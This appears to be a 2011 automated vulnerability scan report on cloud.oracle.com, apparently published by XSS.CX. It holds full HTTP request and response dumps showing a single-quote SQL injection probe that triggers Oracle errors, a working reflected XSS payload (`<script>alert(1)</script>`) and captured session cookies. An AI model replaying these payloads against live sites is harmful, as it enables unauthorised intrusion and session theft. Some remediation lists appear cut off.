XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, cloud.oracle.com

Report generated by XSS.CX at Sun Oct 16 21:06:29 CDT 2011.



1. SQL injection

1.1. https://cloud.oracle.com/mycloud/wwv_flow.accept [p_arg_names parameter]

1.2. https://cloud.oracle.com/mycloud/wwv_flow.accept [p_flow_step_id parameter]

2. Cross-site scripting (reflected)

3. Session token in URL

3.1. https://cloud.oracle.com/mycloud/APEX_040100.wwv_flow_image_generator.get_image

3.2. https://cloud.oracle.com/mycloud/f

3.3. https://cloud.oracle.com/mycloud/wwv_flow.accept

4. SSL cookie without secure flag set

4.1. https://cloud.oracle.com/mycloud/f

4.2. https://cloud.oracle.com/mycloud/wwv_flow.accept

5. Cookie without HttpOnly flag set

5.1. https://cloud.oracle.com/mycloud/f

5.2. https://cloud.oracle.com/mycloud/wwv_flow.accept

6. Credit card numbers disclosed

6.1. https://cloud.oracle.com/mycloud/f

6.2. https://cloud.oracle.com/mycloud/wwv_flow.accept

7. Cacheable HTTPS response

7.1. https://cloud.oracle.com/mycloud/f

7.2. https://cloud.oracle.com/mycloud/wwv_flow.accept



1. SQL injection  next
There are 2 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. https://cloud.oracle.com/mycloud/wwv_flow.accept [p_arg_names parameter]  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://cloud.oracle.com
Path:   /mycloud/wwv_flow.accept

Issue detail

The p_arg_names parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the p_arg_names parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /mycloud/wwv_flow.accept HTTP/1.1
Host: cloud.oracle.com
Connection: keep-alive
Content-Length: 419
Cache-Control: max-age=0
Origin: https://cloud.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://cloud.oracle.com/mycloud/f?p=service2:notify_me:0:::::
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORACLE_CLOUD=BC96E6ADD30286BA; WWV_PUBLIC_SESSION_5003=4454627354458997; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; s_nr=1318815515990; gpw_e24=https%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice2%3Anotify_me%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FNotify%252520Me%252520of%252520Updates%252520%25257C%252520Oracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Djavascript%25253Aapex.submit('CREATE')%25253B%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA

p_flow_id=5003&p_flow_step_id=1&p_instance=4454627354458997&p_page_submission_id=2015700381117342&p_request=CREATE&p_arg_names=77163203970299379'&p_t01=&p_arg_names=77163411158299380&p_t02=&p_arg_names=77163605215299380&p_t03=&p_arg_names=77163016753299379&p_t04=&p_arg_names=77162817151299379&p_t05=&p_arg_names=77163813569299380&p_arg_names=77
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-11g
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Content-Length: 5392
Date: Mon, 17 Oct 2011 01:39:46 GMT
Connection: keep-alive
Set-Cookie: BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:39:48 GMT; path=/

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html class="ie7 no-css3"> <![endif]-->
<!--[if IE 8 ]> <html class="ie8 no-css3"> <![endif]-->
<!--[if IE 9 ]>
...[SNIP]...
<td>ORA-06502: PL/SQL: numeric or value error: character to number conversion error</td>
...[SNIP]...

1.2. https://cloud.oracle.com/mycloud/wwv_flow.accept [p_flow_step_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://cloud.oracle.com
Path:   /mycloud/wwv_flow.accept

Issue detail

The p_flow_step_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the p_flow_step_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /mycloud/wwv_flow.accept HTTP/1.1
Host: cloud.oracle.com
Connection: keep-alive
Content-Length: 419
Cache-Control: max-age=0
Origin: https://cloud.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://cloud.oracle.com/mycloud/f?p=service2:notify_me:0:::::
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORACLE_CLOUD=BC96E6ADD30286BA; WWV_PUBLIC_SESSION_5003=4454627354458997; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; s_nr=1318815515990; gpw_e24=https%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice2%3Anotify_me%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FNotify%252520Me%252520of%252520Updates%252520%25257C%252520Oracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Djavascript%25253Aapex.submit('CREATE')%25253B%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA

p_flow_id=5003&p_flow_step_id=1'&p_instance=4454627354458997&p_page_submission_id=2015700381117342&p_request=CREATE&p_arg_names=77163203970299379&p_t01=&p_arg_names=77163411158299380&p_t02=&p_arg_names=77163605215299380&p_t03=&p_arg
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-11g
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Content-Length: 518
Date: Mon, 17 Oct 2011 01:39:37 GMT
Connection: keep-alive
Set-Cookie: BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:39:39 GMT; path=/

<table summary=""><tr><td><img src="/i/error.gif" border="0" /></td><td>Error</td><td>ERR-1412 Unable to resolve page alias (1').</td></tr><tr><td></td><td></td><td>ORA-06502: PL/SQL: numeric or value error: character to number conversion error
ORA-06502: PL/SQL: numeric or value error: character to number conversion error</td>
...[SNIP]...

2. Cross-site scripting (reflected)  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://cloud.oracle.com
Path:   /mycloud/wwv_flow.accept

Issue detail

The value of the p_md5_checksum request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7de15"><script>alert(1)</script>f63bfb69bab was submitted in the p_md5_checksum parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request

POST /mycloud/wwv_flow.accept HTTP/1.1
Host: cloud.oracle.com
Connection: keep-alive
Content-Length: 436
Cache-Control: max-age=0
Origin: https://cloud.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://cloud.oracle.com/mycloud/f?p=service2:notify_me:0:::1::
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWV_PUBLIC_SESSION_5001=3598503052462700; ORACLE_CLOUD=C883817E0FE44F56; WWV_PUBLIC_SESSION_5003=1479613243090993; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; s_nr=1318815714959; gpw_e24=https%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice2%3Anotify_me%3A0%3A%3A%3A1%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FNotify%252520Me%252520of%252520Updates%252520%25257C%252520Oracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Djavascript%25253Aapex.submit('CREATE')%25253B%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA

p_flow_id=5003&p_flow_step_id=1&p_instance=1479613243090993&p_page_submission_id=9442049033674&p_request=CREATE&p_arg_names=77163203970299379&p_t01=xss&p_arg_names=77163411158299380&p_t02=xss&p_arg_na
...[SNIP]...
g_names=77163016753299379&p_t04=xss&p_arg_names=77162817151299379&p_t05=US&p_arg_names=77163813569299380&p_arg_names=77161232145299376&p_t07=nqyy&p_arg_names=77161423188299376&p_t08=xs&p_md5_checksum=7de15"><script>alert(1)</script>f63bfb69bab

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-11g
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-Powered-By: Servlet/2.5 JSP/2.1
X-Frame-Options: DENY
Content-Type: text/html; charset=utf-8
Content-Language: en
Vary: Accept-Encoding
Content-Length: 19604
Date: Mon, 17 Oct 2011 01:45:33 GMT
Connection: keep-alive
Set-Cookie: BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:45:35 GMT; path=/

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html class="ie7 no-css3"> <![endif]-->
<!--[if IE 8 ]> <html class="ie8 no-css3"> <![endif]-->
<!--[if IE 9 ]>
...[SNIP]...
<input type="hidden" name="p_md5_checksum" value="7de15"><script>alert(1)</script>f63bfb69bab" />
...[SNIP]...

3. Session token in URL  previous  next
There are 3 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


3.1. https://cloud.oracle.com/mycloud/APEX_040100.wwv_flow_image_generator.get_image  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://cloud.oracle.com
Path:   /mycloud/APEX_040100.wwv_flow_image_generator.get_image

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mycloud/APEX_040100.wwv_flow_image_generator.get_image?p_position=4&p_sessionid=4454627354458997 HTTP/1.1
Host: cloud.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://cloud.oracle.com/mycloud/f?p=service2:notify_me:0:::::
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORACLE_CLOUD=BC96E6ADD30286BA; WWV_PUBLIC_SESSION_5003=4454627354458997; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; s_cc=true; s_nr=1318815511138; gpw_e24=no%20value; s_sq=oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA

Response

HTTP/1.1 302 Moved Temporarily
Location: http://cloud.oracle.com/mycloud/APEX_040100.wwv_flow_image_generator.get_image?p_position=4&p_sessionid=4454627354458997
Server: BigIP
Content-Length: 0
Date: Mon, 17 Oct 2011 01:38:08 GMT
Connection: keep-alive


3.2. https://cloud.oracle.com/mycloud/f  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://cloud.oracle.com
Path:   /mycloud/f

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /mycloud/f?p=service2:notify_me:0 HTTP/1.1
Host: cloud.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://cloud.oracle.com/mycloud/f?p=service:home:0:::::
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; s_nr=1318815502460; gpw_e24=http%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice%3Ahome%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FOracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice2%25253Anotify_me%25253A0%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-11g
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-Powered-By: Servlet/2.5 JSP/2.1
X-Frame-Options: DENY
Content-Type: text/html; charset=utf-8
Content-Language: en
Vary: Accept-Encoding
Content-Length: 18703
Date: Mon, 17 Oct 2011 01:38:04 GMT
Connection: keep-alive
Set-Cookie: BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:06 GMT; path=/

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html class="ie7 no-css3"> <![endif]-->
<!--[if IE 8 ]> <html class="ie8 no-css3"> <![endif]-->
<!--[if IE 9 ]>
...[SNIP]...
<div class="confirmBox">
<img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=1&p_sessionid=4454627354458997" height="60", width="40"/>
<img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=2&p_sessionid=4454627354458997" height="60", width="40"/>
<img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=3&p_sessionid=4454627354458997" height="60", width="40"/>
<img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=4&p_sessionid=4454627354458997" height="60", width="40"/>
</div>
...[SNIP]...

3.3. https://cloud.oracle.com/mycloud/wwv_flow.accept  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://cloud.oracle.com
Path:   /mycloud/wwv_flow.accept

Issue detail

The response contains the following links that appear to contain session tokens:

Request

POST /mycloud/wwv_flow.accept HTTP/1.1
Host: cloud.oracle.com
Connection: keep-alive
Content-Length: 419
Cache-Control: max-age=0
Origin: https://cloud.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://cloud.oracle.com/mycloud/f?p=service2:notify_me:0:::::
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORACLE_CLOUD=BC96E6ADD30286BA; WWV_PUBLIC_SESSION_5003=4454627354458997; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; s_nr=1318815515990; gpw_e24=https%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice2%3Anotify_me%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FNotify%252520Me%252520of%252520Updates%252520%25257C%252520Oracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Djavascript%25253Aapex.submit('CREATE')%25253B%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA

p_flow_id=5003&p_flow_step_id=1&p_instance=4454627354458997&p_page_submission_id=2015700381117342&p_request=CREATE&p_arg_names=77163203970299379&p_t01=&p_arg_names=77163411158299380&p_t02=&p_arg_names
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-11g
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-Powered-By: Servlet/2.5 JSP/2.1
X-Frame-Options: DENY
Content-Type: text/html; charset=utf-8
Content-Language: en
Vary: Accept-Encoding
Content-Length: 20548
Date: Mon, 17 Oct 2011 01:38:15 GMT
Connection: keep-alive
Set-Cookie: BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:17 GMT; path=/

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html class="ie7 no-css3"> <![endif]-->
<!--[if IE 8 ]> <html class="ie8 no-css3"> <![endif]-->
<!--[if IE 9 ]>
...[SNIP]...
<div class="confirmBox">
<img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=1&p_sessionid=4454627354458997" height="60", width="40"/>
<img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=2&p_sessionid=4454627354458997" height="60", width="40"/>
<img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=3&p_sessionid=4454627354458997" height="60", width="40"/>
<img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=4&p_sessionid=4454627354458997" height="60", width="40"/>
</div>
...[SNIP]...

4. SSL cookie without secure flag set  previous  next
There are 2 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


4.1. https://cloud.oracle.com/mycloud/f  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cloud.oracle.com
Path:   /mycloud/f

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mycloud/f?p=service2:notify_me:0 HTTP/1.1
Host: cloud.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://cloud.oracle.com/mycloud/f?p=service:home:0:::::
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; s_nr=1318815502460; gpw_e24=http%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice%3Ahome%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FOracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice2%25253Anotify_me%25253A0%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-11g
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-Powered-By: Servlet/2.5 JSP/2.1
X-Frame-Options: DENY
Content-Type: text/html; charset=utf-8
Content-Language: en
Vary: Accept-Encoding
Content-Length: 18703
Date: Mon, 17 Oct 2011 01:38:04 GMT
Connection: keep-alive
Set-Cookie: BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:06 GMT; path=/

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html class="ie7 no-css3"> <![endif]-->
<!--[if IE 8 ]> <html class="ie8 no-css3"> <![endif]-->
<!--[if IE 9 ]>
...[SNIP]...

4.2. https://cloud.oracle.com/mycloud/wwv_flow.accept  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cloud.oracle.com
Path:   /mycloud/wwv_flow.accept

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /mycloud/wwv_flow.accept HTTP/1.1
Host: cloud.oracle.com
Connection: keep-alive
Content-Length: 419
Cache-Control: max-age=0
Origin: https://cloud.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://cloud.oracle.com/mycloud/f?p=service2:notify_me:0:::::
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORACLE_CLOUD=BC96E6ADD30286BA; WWV_PUBLIC_SESSION_5003=4454627354458997; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; s_nr=1318815515990; gpw_e24=https%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice2%3Anotify_me%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FNotify%252520Me%252520of%252520Updates%252520%25257C%252520Oracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Djavascript%25253Aapex.submit('CREATE')%25253B%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA

p_flow_id=5003&p_flow_step_id=1&p_instance=4454627354458997&p_page_submission_id=2015700381117342&p_request=CREATE&p_arg_names=77163203970299379&p_t01=&p_arg_names=77163411158299380&p_t02=&p_arg_names
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-11g
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-Powered-By: Servlet/2.5 JSP/2.1
X-Frame-Options: DENY
Content-Type: text/html; charset=utf-8
Content-Language: en
Vary: Accept-Encoding
Content-Length: 20548
Date: Mon, 17 Oct 2011 01:38:15 GMT
Connection: keep-alive
Set-Cookie: BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:17 GMT; path=/

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html class="ie7 no-css3"> <![endif]-->
